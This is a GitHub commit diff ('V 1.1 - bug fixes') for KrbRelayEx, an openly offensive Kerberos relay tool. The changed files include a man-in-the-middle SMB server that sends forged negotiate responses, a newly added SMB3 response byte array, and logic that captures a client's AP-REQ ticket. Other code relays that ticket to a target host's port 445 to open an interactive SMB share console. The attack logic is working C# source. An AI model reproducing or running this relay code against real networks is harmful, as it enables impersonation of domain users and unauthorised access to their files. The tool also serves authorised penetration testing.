Skip to content

Commit 17dfc18

Browse files
author
Andrea Pierini
committed
V 1.1 - bug fixes
1 parent ef104cb commit 17dfc18

597 files changed

Lines changed: 4579 additions & 3196 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs

Lines changed: 41 additions & 26 deletions
Original file line numberDiff line numberDiff line change
@@ -32,7 +32,7 @@ class SMBCommandSocketConsole
3232

3333
public byte[] apreqBuffer;
3434
public FakeSMBServer currSocketServer;
35-
public async Task Start(int port, State state, byte[] buffer)
35+
public async Task Start(int port, State state, byte[] buffer)
3636
{
3737
// Define the IP address and port
3838

@@ -45,33 +45,33 @@ public async Task Start(int port, State state, byte[] buffer)
4545
{
4646
// Start the listener
4747
listener.Start();
48-
Console.WriteLine("[*] SMB Console Server started on any:{0}. Waiting for connections...", port);
48+
Console.WriteLine("[*] SMB Console Server started on [any:{0}]. Waiting for connections...", port);
4949

5050
//while (true)
5151
{
5252
// Accept a client socket
5353
//Socket clientSocket = listener.AcceptTcpClientAsync(); // AcceptSocket(); //AcceptTcpClientAsync()
5454
TcpClient clientSocket = await listener.AcceptTcpClientAsync();
55-
56-
57-
Console.WriteLine("[*] SMB Console Server connected client:{0}", clientSocket.Client.RemoteEndPoint);
55+
56+
57+
Console.WriteLine("[*] SMB Console Server connected client: [{0}]", clientSocket.Client.RemoteEndPoint);
5858
SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
5959
//smbc.curSocketServer = currSocketServer;
6060
KrbRelay.Clients.Smb smb2 = new Smb(clientSocket.Client);
6161
//smbc.currSourceSocket = state.SourceSocket;
6262
//smbc.currDestSocket = state.TargetSocket;
6363
//smbc.ServerType = State.ServerType;
64-
smbc.curSocketServer = currSocketServer;
64+
//smbc.curSocketServer = currSocketServer;
6565
bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
6666
if (!isConnected)
6767
{
68-
Console.WriteLine("[-] Could not connect to {0}:445", Program.targetFQDN);
68+
Console.WriteLine("[-] Could not connect to [{0}:445]", Program.targetFQDN);
6969

7070
}
7171

7272

7373

74-
Console.WriteLine("[*] SMB relay Connected to: {0}:445", Program.targetFQDN);
74+
Console.WriteLine("[*] SMB relay Connected to: [{0}:445]", Program.targetFQDN);
7575
//state.isRelayed = true;
7676
//Task.Run(() => smb2.smbConnect(smbc));
7777
Task.Run(() => smb2.smbConnect(smbc, buffer));
@@ -141,6 +141,20 @@ public class FakeSMBServer
141141
0x13,0x09,0x93,0x27,0xdb,0x6e,0x41,0xee,0xf8,0x14,0x45,0x6e,0xdb,0xfa,0x09,0x8c,
142142
0x14,0x87,0xf9,0x4c,0x14,0x73,0xca,0xbd,0xe5,0x20,0x00,0x00,0x02,0x00,0x04,0x00,
143143
0x00,0x00,0x00,0x00,0x01,0x00,0x02,0x00};
144+
byte[] smb3NegotiateProtocolResponse = new byte[] {0x00, 0x00, 0x01, 0x74, 0xFE, 0x53, 0x4D, 0x42, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
145+
0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
146+
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00,
147+
0x01, 0x00, 0x11, 0x03, 0x05, 0x00, 0x93, 0x6D, 0x4F, 0xE8, 0xB6, 0xD9, 0x23, 0x4A, 0xB5, 0x33, 0x05, 0x98, 0x82, 0xA8, 0xE3, 0xAE, 0x2F, 0x00, 0x00, 0x00, 0x00, 0x00,
148+
0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0xED, 0x25, 0x57, 0x35, 0x15, 0x40, 0xDB, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00,
149+
0x78, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x60, 0x76, 0x06, 0x06, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x02, 0xA0, 0x6C, 0x30, 0x6A, 0xA0, 0x3C, 0x30, 0x3A, 0x06, 0x0A, 0x2B, 0x06,
150+
0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x1E, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x82, 0xF7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x12, 0x01,
151+
0x02, 0x02, 0x06, 0x0A, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x12, 0x01, 0x02, 0x02, 0x03, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0A, 0xA3, 0x2A,
152+
0x30, 0x28, 0xA0, 0x26, 0x1B, 0x24, 0x6E, 0x6F, 0x74, 0x5F, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x64, 0x5F, 0x69, 0x6E, 0x5F, 0x52, 0x46, 0x43, 0x34, 0x31, 0x37, 0x38,
153+
0x40, 0x70, 0x6C, 0x65, 0x61, 0x73, 0x65, 0x5F, 0x69, 0x67, 0x6E, 0x6F, 0x72, 0x65, 0x01, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x01, 0x00,
154+
0x72, 0x84, 0xBE, 0xA6, 0x02, 0x97, 0x90, 0xA5, 0xBA, 0x06, 0xCB, 0xF0, 0xF3, 0x7E, 0xFD, 0x60, 0x01, 0x21, 0x66, 0xB8, 0x88, 0x25, 0xE9, 0x55, 0xB0, 0xBD, 0x2C, 0x4A,
155+
0x2C, 0x95, 0x52, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00,
156+
0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
157+
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00};
144158

145159

146160
public FakeSMBServer(int listenPort, string targetHost, int targetPort)
@@ -168,7 +182,8 @@ public FakeSMBServer(int listenPort, string targetHost, int targetPort, string s
168182
}
169183
public void Start(bool fwd)
170184
{
171-
Console.WriteLine("[*] Starting FakeSMBServer on port:{0}", _listenPort);
185+
ForwardOnly = fwd;
186+
Console.WriteLine($"[*] Starting MiTMServer on port:[{_listenPort}] {(ForwardOnly ? "(Forward Only mode)" : "")} ");
172187
_listenerSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
173188
_listenerSocket.Bind(new IPEndPoint(IPAddress.Any, _listenPort));
174189
_listenerSocket.Listen(100); // Allow up to 100 pending connections
@@ -177,14 +192,14 @@ public void Start(bool fwd)
177192
_isRunning = true;
178193
_listenerSocket.BeginAccept(OnClientConnect, null);
179194

180-
ForwardOnly = fwd;
195+
181196

182197
}
183198
public void Stop()
184199
{
185200
if (_isRunning)
186201
{
187-
Console.WriteLine("[*] Stopping FakeSMBServer on port:{0}", _listenPort);
202+
Console.WriteLine("[*] Stopping MiTMServer on port:[{0}]", _listenPort);
188203
_isRunning = false;
189204

190205
// Stop listening for new connections
@@ -198,13 +213,13 @@ public void Stop()
198213

199214
_activeConnections.Clear();
200215

201-
Console.WriteLine("[*] FakeSMBServer {0} stopped.", _listenPort);
216+
Console.WriteLine("[*] MiTMServer [{0}] stopped.", _listenPort);
202217
}
203218
}
204219

205220
public void ListConnectedClients()
206221
{
207-
Console.WriteLine("\n[*] Connected Clients on port:{0}", _listenPort);
222+
Console.WriteLine("\n[*] Connected Clients on port:[{0}]", _listenPort);
208223
foreach (var key in _activeConnections.Keys)
209224
{
210225
Console.WriteLine($"- {key}");
@@ -221,7 +236,7 @@ private void OnClientConnect(IAsyncResult ar)
221236
// Create a unique key for this connection
222237
string clientKey = $"{clientSocket.RemoteEndPoint}-{Guid.NewGuid()}";
223238

224-
Console.WriteLine($"[*] FakeSMBServer:{_listenPort} -> Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
239+
Console.WriteLine($"[*] MiTMServer [{_listenPort}]: Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
225240

226241
// Create a new connection to the target server
227242
Socket targetSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
@@ -268,25 +283,25 @@ private void OnDataFromClient(IAsyncResult ar)
268283
Program.forwdardmode = true;
269284

270285
state.isRelayed = true;
271-
Console.WriteLine("[*] FakeSMBServer {0}: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
286+
Console.WriteLine("[*] MiTMServer [{0}]: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
272287
state.SourceSocket.Send(smbNegotiateProtocolResponse, smbNegotiateProtocolResponse.Length, SocketFlags.None);
273288
l = state.SourceSocket.Receive(buffer);
274-
Console.WriteLine("[*] FakeSMBServer {0}: sending smb2NegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
275-
state.SourceSocket.Send(smb2NegotiateProtocolResponse, smb2NegotiateProtocolResponse.Length, SocketFlags.None);
289+
Console.WriteLine("[*] MiTMServer [{0}]: sending smb3NegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
290+
state.SourceSocket.Send(smb3NegotiateProtocolResponse, smb3NegotiateProtocolResponse.Length, SocketFlags.None);
276291
l = state.SourceSocket.Receive(buffer);
277292
//int ticketOffset = Helpers.PatternAt(buffer, new byte[] { 0x60, 0x82 }); // 0x6e, 0x82, 0x06
278293
buffer = buffer.Skip(4).ToArray();
279294
Program.apreqBuffer = Program.ExtractSecurityBlob(buffer);
280295
if (!(Program.apreqBuffer[0] == 0x60 && Program.apreqBuffer[1] == 0x82))
281296
{
282-
Console.WriteLine("[-] FakeSMBServer {0}: Could not find AP-REQ, maybe using NTLM?", state.SourceSocket.RemoteEndPoint);
297+
Console.WriteLine("[-] MiTMServer [{0}]: Could not find AP-REQ, maybe using NTLM?", state.SourceSocket.RemoteEndPoint);
283298
state.isRelayed = false;
284299

285-
//CloseConnection(state);
300+
CloseConnection(state);
286301
return;
287302

288303
}
289-
Console.WriteLine("[*] FakeSMBServer {0}: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
304+
Console.WriteLine("[*] MiTMServer [{0}]: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
290305

291306

292307

@@ -300,9 +315,9 @@ private void OnDataFromClient(IAsyncResult ar)
300315

301316
SMBCommandSocketConsole smbs = new SMBCommandSocketConsole();
302317
smbs.currSocketServer = null;
303-
Console.WriteLine("[*] FakeSMBServer {0}: SMB relay socket console Connected to: {1}:445", state.SourceSocket.RemoteEndPoint, Program.targetFQDN);
318+
Console.WriteLine("[*] MiTMServer [{0}]: SMB relay socket console Connected to: [{1}:445]", state.SourceSocket.RemoteEndPoint, Program.targetFQDN);
304319
Task.Run(() => smbs.Start(Program.bgconsoleStartPort++, state, Program.apreqBuffer));
305-
320+
306321
state.isRelayed = false;
307322

308323
CloseConnection(state);
@@ -319,16 +334,16 @@ private void OnDataFromClient(IAsyncResult ar)
319334
smbc.currDestSocket = state.TargetSocket;
320335
smbc.ServerType = ServerType;
321336
smbc.curSocketServer = this;
322-
bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
337+
bool isConnected = smbc.Connect(IPAddress.Parse(Program.RedirectHost) , SMBTransportType.DirectTCPTransport);
323338
if (!isConnected)
324339
{
325-
Console.WriteLine("[-] Could not connect to {0}:445", Program.targetFQDN);
340+
Console.WriteLine("[-] Could not connect to [{0}:445]", Program.RedirectHost);
326341

327342
}
328343

329344

330345
state.isRelayed = false;
331-
Console.WriteLine("[*] SMB relay Connected to: {0}:445", Program.targetFQDN);
346+
Console.WriteLine("[*] SMB relay Connected to: [{0}:445]", Program.targetFQDN);
332347

333348

334349
Task.Run(() => smb2.smbConnect(smbc, Program.apreqBuffer));
@@ -465,4 +480,4 @@ public void CloseConnection(State state)
465480
//Console.WriteLine($"Error closing connection: {ex.Message}");
466481
}
467482
}
468-
}
483+
}

KrbRelayEx/Clients/Attacks/Smb/Shares.cs

Lines changed: 8 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -331,14 +331,16 @@ public static void smbConsole(SMB2Client smbClient, Socket clientSocket = null,
331331
public static void listShares(SMB2Client smbClient)
332332
{
333333
//https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/8605fd54-6ede-4316-b30d-ecfafa133c1d
334-
List<ShareInfo2Entry> shares = smbClient.ListShares(out var status);
334+
List<string> shares = smbClient.ListShares(out var status);
335335
if (status == NTStatus.STATUS_SUCCESS)
336336
{
337337
Shares.Output("Name Path\n");
338338
Shares.Output("---- ----\n");
339339
foreach (var s in shares)
340340
{
341-
Shares.Output(String.Format("{0, -12} {1}\n", s.NetName.Value, s.Path.Value));
341+
342+
//Shares.Output(String.Format("{0, -12} {1}\n", s.NetName.Value, s.Path.Value));
343+
Shares.Output(String.Format("{0, -12} {1}\n", s, s));
342344
}
343345
}
344346
else
@@ -562,6 +564,7 @@ public void smbConsole(SMB2Client smbClient, Socket cSocket = null, string share
562564
isConnected = true;
563565
clientSocket = cSocket;
564566
ISMBFileStore fileStore = smbClient.TreeConnect(share, out var status);
567+
Console.WriteLine("[*] SMB Console Status:{0}", status);
565568
if (status == NTStatus.STATUS_SUCCESS)
566569
{
567570
while (isConnected)
@@ -676,14 +679,15 @@ public void smbConsole(SMB2Client smbClient, Socket cSocket = null, string share
676679
public void listShares(SMB2Client smbClient)
677680
{
678681
//https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/8605fd54-6ede-4316-b30d-ecfafa133c1d
679-
List<ShareInfo2Entry> shares = smbClient.ListShares(out var status);
682+
//SMBLibrary.Services.ShareInfo2Entry shares = smbClient.ListShares(out NTStatus status);
683+
List<string> shares = smbClient.ListShares(out NTStatus status);
680684
if (status == NTStatus.STATUS_SUCCESS)
681685
{
682686
Output("Name Path\n");
683687
Output("---- ----\n");
684688
foreach (var s in shares)
685689
{
686-
Output(String.Format("{0, -12} {1}\n", s.NetName.Value, s.Path.Value));
690+
Output(String.Format("{0, -12} {1}\n", s, s));
687691
}
688692
}
689693
else

KrbRelayEx/Program.cs

Lines changed: 22 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,7 @@ namespace KrbRelay
3939
internal class Program
4040
{
4141

42-
public const string Version = "V1.0";
42+
public const string Version = "V1.1";
4343
public static string DcomHost = "";
4444
public static string RedirectHost = "";
4545
public static string FakeSPN = "";
@@ -219,13 +219,6 @@ private static void PrintBanner()
219219
Console.WriteLine("██╔═██╗ ██╔══██╗██╔══██╗██╔══██╗██╔══╝ ██║ ██╔══██║ ╚██╔╝ ██╔══╝ ██╔██");
220220
Console.WriteLine("██║ ██╗██║ ██║██████╔╝██║ ██║███████╗███████╗██║ ██║ ██║ ███████╗██╔╝ ██╗");
221221
Console.WriteLine("╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝");
222-
223-
}
224-
private static void ShowHelp()
225-
{
226-
227-
228-
PrintBanner();
229222
Console.WriteLine("\r\r################################################################################");
230223
Console.WriteLine("# #");
231224
Console.WriteLine("# KrbRelayEx by @decoder_it #");
@@ -238,6 +231,14 @@ private static void ShowHelp()
238231
Console.WriteLine("# #");
239232
Console.WriteLine("################################################################################");
240233

234+
}
235+
private static void ShowHelp()
236+
{
237+
238+
239+
240+
241+
241242
Console.WriteLine();
242243
Console.WriteLine("Description:");
243244

@@ -308,18 +309,19 @@ private static void ShowHelp()
308309
}
309310

310311

311-
312312

313313

314314

315-
public static void Main(string[] args)
315+
public static async Task Main(string[] args)
316+
//public static void Main(string[] args)
316317
{
317318

318319

319320

320321
bool show_help = false;
321-
322+
322323
//Guid clsId_guid = new Guid();
324+
PrintBanner();
323325

324326
foreach (var entry in args.Select((value, index) => new { index, value }))
325327
{
@@ -576,7 +578,7 @@ public static void Main(string[] args)
576578
foreach (string item in RedirectPorts)
577579
{
578580

579-
tcpForwarders.Add(new FakeSMBServer(int.Parse(item), RedirectHost, int.Parse(item)));
581+
tcpForwarders.Add(new FakeSMBServer(int.Parse(item), RedirectHost, int.Parse(item),item));
580582
}
581583
foreach (FakeSMBServer item in tcpForwarders)
582584
{
@@ -589,14 +591,14 @@ public static void Main(string[] args)
589591

590592

591593
Console.WriteLine("[*] Hit 'q' for quit, 'r' for restarting Relaying and Port Forwarding, 'l' for listing connected clients");
592-
594+
593595
while (true)
594596
{
595-
597+
596598
if (Console.KeyAvailable)
597599
{
598-
599-
ConsoleKeyInfo key = Console.ReadKey(intercept: true);
600+
601+
ConsoleKeyInfo key = Console.ReadKey(intercept: true);
600602
if (key.KeyChar == 'q')
601603
return;
602604

@@ -605,21 +607,19 @@ public static void Main(string[] args)
605607
SMBtcpFwd.ListConnectedClients();
606608

607609
}
608-
610+
609611
if (key.KeyChar == 'r')
610612
{
611613
Console.WriteLine("[!] Restarting Relay...");
612-
614+
613615
SMBtcpFwd.Stop();
614616
forwdardmode = false;
615617
SMBtcpFwd.Start(false);
616618

617619
}
618-
else
619-
{
620-
Thread.Sleep(500);
621-
}
620+
622621
}
622+
Thread.Sleep(500);
623623
}
624624

625625
}

KrbRelayEx/Smb/SMBLibrary/Authentication/GSSAPI/Enums/GSSAttributeName.cs

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,19 +1,20 @@
1+
using System;
2+
13
namespace SMBLibrary.Authentication.GSSAPI
24
{
35
public enum GSSAttributeName
46
{
57
AccessToken,
68
DomainName,
79
IsAnonymous,
8-
10+
911
/// <summary>
1012
/// Permit access to this user via the guest user account if the normal authentication process fails.
1113
/// </summary>
1214
IsGuest,
13-
1415
MachineName,
1516
OSVersion,
1617
SessionKey,
1718
UserName,
1819
}
19-
}
20+
}

0 commit comments

Comments
 (0)